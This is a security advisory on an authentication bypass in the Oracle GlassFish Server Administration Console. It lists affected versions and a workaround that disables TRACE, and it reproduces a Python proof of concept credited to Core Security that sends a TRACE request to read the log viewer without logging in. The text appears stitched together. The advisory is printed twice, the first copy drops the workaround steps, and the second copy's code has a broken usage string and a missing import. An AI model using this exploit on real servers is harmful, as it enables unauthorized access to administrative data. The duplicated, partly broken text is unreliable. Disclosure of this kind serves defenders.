Description: When the server is vulnerable to Oracle GlassFish Server Administration Console GET Request Authentication Bypass, it fails to enforce authentication on HTTP requests that contain lower case method names (e.g. ’get’). A remote, unauthenticated attacker could exploit this to upload and execute arbitrary code.
Vulnerable packages: Oracle GlassFish Server 3.0.1
Sun GlassFish Enterprise Server 2.1.1
Non-vulnerable packages: Oracle GlassFish Server 3.1
Contact Oracle for patches for other GlassFish versions
Work around suggested by Core Security [1]:
For users who cannot upgrade to the latest patched version, the following workaround can be applied in order to avoid this flaw:
Nessus Scanner can be used to check the availability of the vulnerability
The following Python code published by Core Security is a Proof-of-Concept of the vulnerability; it will retrieve the content of the Log Viewer effectively bypassing the authentication [1]:
import sys
import httplib
def make_trace_request(host, port, selector):
print '[*] TRACE request: %s' % selector
headers = { 'User-Agent': 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)',
'Host': '%s:%s' % (host, port),
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Language': 'en-us,en;q=0.5',
'Accept-Charset': 'ISO-8859-1,utf-8;q=0.7,*;q=0.7',
'Accept-Encoding': 'gzip,deflate',
'Connection': 'close',
'Referer': 'http://%s:%s%s' % (host, port, selector)}
conn = httplib.HTTPConnection(host, port)
conn.request('TRACE', selector, headers=headers)
response = conn.getresponse()
conn.close()
print response.status, response.reason
print response.getheaders()
print response.read()
if len(sys.argv) != 3:
print "Usage: $ python poc.py \nE.g: $ python poc.py 192.168.0.1 4848"
sys.exit(0)
host = sys.argv[1]
port = int(sys.argv[2])
make_trace_request(host, port, '/common/logViewer/logViewer.jsf')
Reference
[1] Source: http://www.coresecurity.com/content/oracle-glassfish-server-administration-console-authentication-bypass
[2] http://www.securityfocus.com/archive/1/517965/30/0/threaded
Vulnerable packages: Oracle GlassFish Server 3.0.1
Sun GlassFish Enterprise Server 2.1.1
Non-vulnerable packages: Oracle GlassFish Server 3.1
Contact Oracle for patches for other GlassFish versions
Work around suggested by Core Security [1]:
For users who cannot upgrade to the latest patched version, the following workaround can be applied in order to avoid this flaw:
- In the GlassFish Admin Console, go to the Tasks tree.
- Navigate through:
Network Config > Protocols > admin-listener > HTTP
. - There is a checkbox "Trace: Enable TRACE operation" (checked by default); uncheck it and then save changes.
- Finally, restart GlassFish by doing
C:\glassfishv3\bin>asadmin restart-domain
Nessus Scanner can be used to check the availability of the vulnerability
The following Python code published by Core Security is a Proof-of-Concept of the vulnerability; it will retrieve the content of the Log Viewer effectively bypassing the authentication [1]:
import httplib
def make_trace_request(host, port, selector):
print '[*] TRACE request: %s' % selector
headers = { 'User-Agent': 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)',
'Host': '%s:%s' % (host, port),
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Language': 'en-us,en;q=0.5',
'Accept-Charset': 'ISO-8859-1,utf-8;q=0.7,*;q=0.7',
'Accept-Encoding': 'gzip,deflate',
'Connection': 'close',
'Referer': 'http://%s:%s%s' % (host, port, selector)}
conn = httplib.HTTPConnection(host, port)
conn.request('TRACE', selector, headers=headers)
response = conn.getresponse()
conn.close()
print response.status, response.reason
print response.getheaders()
print response.read()
if len(sys.argv) != 3:
print "Usage: $ python poc.py
sys.exit(0)
host = sys.argv[1]
port = int(sys.argv[2])
make_trace_request(host, port, '/common/logViewer/logViewer.jsf')
Reference
[1] Source: http://www.coresecurity.com/content/oracle-glassfish-server-administration-console-authentication-bypass
[2] http://www.securityfocus.com/archive/1/517965/30/0/threaded